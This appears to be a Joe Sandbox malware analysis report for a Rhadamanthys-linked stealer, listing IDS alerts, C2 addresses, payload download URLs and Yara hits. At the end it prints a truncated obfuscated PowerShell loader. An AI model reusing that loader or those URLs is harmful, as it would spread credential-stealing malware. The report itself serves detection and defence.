                        2024-12-05T10:46:27.476397+010028032702Potentially Bad Traffic192.168.2.449737202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:46:34.464003+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449738TCP
                        2024-12-05T10:46:56.026871+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449748TCP
                        2024-12-05T10:47:07.827834+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.449778TCP
                        2024-12-05T10:47:17.427006+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449799TCP
                        2024-12-05T10:47:24.592127+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449815TCP
                        2024-12-05T10:47:31.829677+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449836TCP
                        2024-12-05T10:47:39.003502+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449852TCP
                        2024-12-05T10:47:46.168878+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449868TCP
                        2024-12-05T10:47:53.334073+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449885TCP
                        2024-12-05T10:48:00.486039+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.449905TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F60F0 CryptUnprotectData,12_3_00007DF45B6F60F0
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49799 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49815 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49868 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49885 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49905 version: TLS 1.2
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C0B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2012206135.0000000022B10000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012001791.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 0000000A.00000003.2009854611.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2010288329.0000000022BE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32. source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2011541543.0000000022B90000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2011234761.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2009854611.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2010288329.0000000022BE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2011541543.0000000022B90000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2011234761.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpnscfg.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2012206135.0000000022B10000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012001791.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007BC9000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F0B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,12_3_00007DF45B6F0B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp12_3_00007DF45B701741
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp12_2_0000013E03300511
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 4x nop then dec esp16_2_000002614EFD5681
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 27MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49748
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49799
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49815
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49836
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49852
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49868
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.4:49778
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49905
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.4:49885
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Source: global trafficTCP traffic: 192.168.2.4:49738 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                        Source: Joe Sandbox ViewIP Address: 162.159.200.123 162.159.200.123
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.4:49748
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.4:49778
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: global trafficHTTP traffic detected: GET /ab/infantrymen.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.pts.groupConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.pts.group
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: time.cloudflare.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                        Source: global trafficDNS traffic detected: DNS query: time.google.com
                        Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
                        Source: powershell.exe, 00000003.00000002.1836359278.000002247DC22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                        Source: chrome.exe, 0000000D.00000002.2255888915.00006FF0022F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
                        Source: powershell.exe, 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022401C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pts.group
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1920307649.00000000050E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.1951933890.0000000007BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.dN
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022401C6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pts.group
                        Source: svchost.exeString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000005.00000002.1920307649.00000000050E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022400BAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1936823765.0000000006147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000003.00000002.1793533146.000002240191B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1793533146.0000022400225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pts.group
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1793533146.00000224015AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pts.group/ab/infantrymen.deploy
                        Source: powershell.exe, 00000003.00000002.1793533146.0000022400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1793533146.00000224015AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/ab/infantrymen.deploy
                        Source: powershell.exe, 00000005.00000002.1920307649.0000000005235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/ab/infantrymen.deployt
                        Source: msiexec.exe, 0000000A.00000002.2022940955.0000000006A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/
                        Source: msiexec.exe, 0000000A.00000002.2022940955.0000000006A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin
                        Source: msiexec.exe, 0000000A.00000002.2022940955.0000000006A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.binV
                        Source: msiexec.exe, 0000000A.00000002.2037678895.0000000021B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.binVerisTvewww.tequila.ae/ab/ab.bin
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49799 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49815 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49868 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49885 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.4:49905 version: TLS 1.2
                        Source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_d9ffc832-c
                        Source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_47c4f43d-0
                        Source: Yara matchFile source: 11.3.svchost.exe.4d00000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.22c10000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.4d00000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.229f0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.4ae0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2016070238.0000000004D00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2015900847.0000000004AE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F08CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,12_3_00007DF45B6F08CC

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_984.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7020, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Marescha
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem 